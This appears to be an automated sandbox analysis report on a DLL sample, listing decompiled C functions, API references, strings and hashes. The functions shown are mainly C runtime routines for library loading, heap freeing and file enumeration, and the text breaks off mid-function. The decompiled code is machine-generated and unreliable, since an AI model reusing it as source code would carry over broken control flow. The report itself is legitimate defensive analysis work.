String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: a64d406f9bb44ee2b0312a2040d9e3797cb384b21089f7540188102f44ee768c
Instruction ID: 0e35897829bbf11f0c80e09427057b9ece89438d0da6da3787fb7c4de5fc4ae3
Opcode Fuzzy Hash: a64d406f9bb44ee2b0312a2040d9e3797cb384b21089f7540188102f44ee768c
Instruction Fuzzy Hash: 0B218372618209FF97509FFDCC40D9B7B6CEB013A87108928EB64961D8D771DE5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA50E4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA50E4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6edc3c68 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6edaeafc + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6EDA61C3(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6eda50eb
0x6eda515f
0x6eda50f0
0x6eda50f2
0x6eda50f9
0x6eda50fd
0x6eda5106
0x6eda5115
0x6eda511e
0x6eda5122
0x6eda516b
0x6eda516d
0x6eda5171
0x6eda5174
0x6eda5174
0x6eda517a
0x6eda517a
0x6eda5166
0x6eda516a
0x6eda516a
0x6eda5124
0x6eda512d
0x6eda5157
0x6eda515a
0x6eda515c
0x6eda515c
0x00000000
0x6eda515c
0x6eda512f
0x6eda513a
0x6eda513f
0x6eda5144
0x00000000
0x00000000
0x6eda514b
0x6eda5151
0x6eda5155
0x00000000
0x00000000
0x00000000
0x6eda5155
0x6eda5102
0x00000000
0x00000000
0x00000000
0x6eda5104
0x6eda5164
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EDA51A5,00000000,?,00000001,00000000,?,6EDA521C,00000001,FlsFree,6EDAEBB8,FlsFree,00000000), ref: 6EDA5174

Strings

api-ms-, xrefs: 6EDA5134

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: f662f66e5af51befc657a540cb5c8b1c3c48a28a0586ebe0809fde7811a2e361
Instruction ID: a52d993371eee3ce8bb481dd7fa9e086675a7bad4216c2742fff6e9ec511c78b
Opcode Fuzzy Hash: f662f66e5af51befc657a540cb5c8b1c3c48a28a0586ebe0809fde7811a2e361
Instruction Fuzzy Hash: 13117331A45A21EBEB524BACDC85B5E37A5AB02760F150221EF15EB2C0D770EB01CAD5

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5700, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6EDA5700(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6edae104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6eda5706
0x6eda570a
0x6eda5715
0x6eda571d
0x6eda5728
0x6eda572e
0x6eda5732
0x6eda5739
0x6eda573f
0x6eda573f
0x6eda5741
0x6eda5746
0x00000000
0x6eda574b
0x6eda5754

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EDA56B2,?,?,6EDA567A,?,00000001,?), ref: 6EDA5715
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EDA5728
FreeLibrary.KERNEL32(00000000,?,?,6EDA56B2,?,?,6EDA567A,?,00000001,?), ref: 6EDA574B

Strings

mscoree.dll, xrefs: 6EDA570E
CorExitProcess, xrefs: 6EDA5720

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4c7709b7514e1750dd5f3543e0fcff617733713e509a3e32c0ff871fab0eb520
Instruction ID: 43f7101099cb29eb8a849ebe12762ada551bdd61fd43c113be6052a8373aaa00
Opcode Fuzzy Hash: 4c7709b7514e1750dd5f3543e0fcff617733713e509a3e32c0ff871fab0eb520
Instruction Fuzzy Hash: E8F08C31900A19FBEF019B98CD59BADBB78FB41312F100160FE05A2250CB318F52DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA9C7B, Relevance: 7.7, APIs: 5, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E6EDA9C7B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6edc3004; // 0x8da52076
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E6EDAB3AC(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E6EDA7DC9(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E6EDA3753(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E6EDA9C5B(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E6EDA7DC9(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E6EDA854D(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E6EDA854D(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E6EDA9C5B(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E6EDA7E45();
									if(_t95 != 0) {
										E6EDA9C5B(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E6EDA8E8F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E6EDAD5B0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E6EDA854D(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E6EDA8E8F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E6EDAD5B0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x6eda9c80
0x6eda9c81
0x6eda9c82
0x6eda9c89
0x6eda9c8e
0x6eda9c94
0x6eda9c9a
0x6eda9ca0
0x6eda9ca3
0x6eda9ca3
0x6eda9ca6
0x6eda9ca8
0x6eda9ca8
0x6eda9ca6
0x6eda9caa
0x6eda9caf
0x6eda9cb6
0x6eda9cb9
0x6eda9cb9
0x6eda9cda
0x6eda9cdc
0x6eda9cdf
0x6eda9ce4
0x6eda9e42
0x6eda9e45
0x6eda9e46
0x6eda9e47
0x6eda9e55
0x6eda9cea
0x6eda9ced
0x6eda9cf2
0x6eda9cf4
0x6eda9cf6
0x6eda9d2d
0x6eda9d2f
0x6eda9d31
0x6eda9e37
0x6eda9e37
0x6eda9e39
0x6eda9e3a
0x6eda9e40
0x00000000
0x6eda9e40
0x6eda9d40
0x6eda9d45
0x6eda9d4a
0x00000000
0x00000000
0x6eda9d50
0x6eda9d67
0x6eda9d6b
0x00000000
0x00000000
0x6eda9d71
0x6eda9d79
0x6eda9db6
0x6eda9dbb
0x6eda9dbd
0x6eda9dbf
0x6eda9df0
0x6eda9df2
0x6eda9df4
0x6eda9e30
0x6eda9e31
0x00000000
0x6eda9e11
0x6eda9e13
0x6eda9e14
0x6eda9e18
0x6eda9e56
0x6eda9e59
0x6eda9e1a
0x6eda9e1a
0x6eda9e1b
0x6eda9e1b
0x6eda9e1c
0x6eda9e1d
0x6eda9e1e
0x6eda9e1f
0x6eda9e27
0x6eda9e2e
0x6eda9e5f
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda9e2e
0x6eda9df4
0x6eda9dc3
0x6eda9dde
0x6eda9de3
0x00000000
0x00000000
0x6eda9de5
0x6eda9deb
0x6eda9deb
0x00000000
0x6eda9deb
0x6eda9dc5
0x6eda9dca
0x6eda9dce
0x00000000
0x00000000
0x6eda9dd0
0x00000000
0x6eda9dd0
0x6eda9d7b
0x6eda9d80
0x00000000
0x00000000
0x6eda9d88
0x00000000
0x00000000
0x6eda9da4
0x6eda9da8
0x00000000
0x00000000
0x00000000
0x6eda9dae
0x6eda9cfd
0x6eda9d18
0x6eda9d1d
0x6eda9d28
0x6eda9d28
0x00000000
0x6eda9d28
0x6eda9d1f
0x6eda9d25
0x6eda9d25
0x00000000
0x6eda9d25
0x6eda9cff
0x6eda9d04
0x6eda9d08
0x00000000
0x00000000
0x6eda9d0a
0x00000000
0x6eda9d0a

APIs

__alloca_probe_16.LIBCMT ref: 6EDA9CFF
__alloca_probe_16.LIBCMT ref: 6EDA9DC5
__freea.LIBCMT ref: 6EDA9E31

Part of subcall function 6EDA8E8F: HeapAlloc.KERNEL32(00000000,6EDA8BCE,6EDA8BCE,?,6EDA78FA,00000220,?,6EDA8BCE,?,?,?,?,6EDAACE2,00000001,?,?), ref: 6EDA8EC1

__freea.LIBCMT ref: 6EDA9E3A
__freea.LIBCMT ref: 6EDA9E5F

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 9f559567173ad50c3de5f75a3485a26f4db015252c8950aa0b290ac259457076
Instruction ID: 5c32088a26fbb341d4979bf2653f5a95664f16d2fb1137ed1f22b86c45f84206
Opcode Fuzzy Hash: 9f559567173ad50c3de5f75a3485a26f4db015252c8950aa0b290ac259457076
Instruction Fuzzy Hash: 9C51BF7260121AEBEF118FECEC40EAF3AAEDF45664F114528FE14A6144E736DF5186A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDAB227, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDAB227(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6edc36f8; // 0x6edc3748
					if(_t23 != 0) {
						E6EDA6B43(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6edc36fc; // 0x6edc4270
					if(_t24 != 0) {
						E6EDA6B43(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6edc3700; // 0x6edc4270
					if(_t25 != 0) {
						E6EDA6B43(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6edc3728; // 0x6edc374c
					if(_t26 != 0) {
						E6EDA6B43(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6edc372c; // 0x6edc4274
					if(_t27 != 0) {
						return E6EDA6B43(_t6);
					}
				}
				return _t6;
			}

0x6edab22d
0x6edab232
0x6edab236
0x6edab23c
0x6edab23f
0x6edab244
0x6edab248
0x6edab24e
0x6edab251
0x6edab256
0x6edab25a
0x6edab260
0x6edab263
0x6edab268
0x6edab26c
0x6edab272
0x6edab275
0x6edab27a
0x6edab27b
0x6edab27e
0x6edab284
0x00000000
0x6edab28c
0x6edab284
0x6edab28f

APIs

_free.LIBCMT ref: 6EDAB23F

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDAB251
_free.LIBCMT ref: 6EDAB263
_free.LIBCMT ref: 6EDAB275
_free.LIBCMT ref: 6EDAB287

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4dc66762906608b7d2120950156a072b5204c8cf7153be9f9603e5c5f5d284d0
Instruction ID: 4f86aae5ec0ac05a957316734004ada05aece181bf6bb0dd1ae66de2198e89bd
Opcode Fuzzy Hash: 4dc66762906608b7d2120950156a072b5204c8cf7153be9f9603e5c5f5d284d0
Instruction Fuzzy Hash: A8F03C71414A0ADB8A40DBEDD19DC5E73DEEB057947640C4AF274D7680DB30FB8146A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6D35, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6EDA6D35(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E6EDA5A41(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6EDA9A57(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6EDA6A26();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6EDA6AE6(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6EDA9A57(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6EDA7327(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6EDA6B43(_t300);
														_t302 = _v12;
													}
													E6EDA6B43(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6EDA9A57(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6EDA6A26();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6edc3004; // 0x8da52076
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6EDA9AB0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6EDA6D16(_t244 - _t287 + 1, _t287,  &_v676, E6EDA7232(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6EDA6C47( &(_v608.cFileName),  &_v640,  &_v609, E6EDA7232(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6EDA6B43(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6EDA6B43(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6EDA9560(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6EDA6B7D);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6EDA6B43(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6EDA3753(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6EDA6B43(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6EDA9A70(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
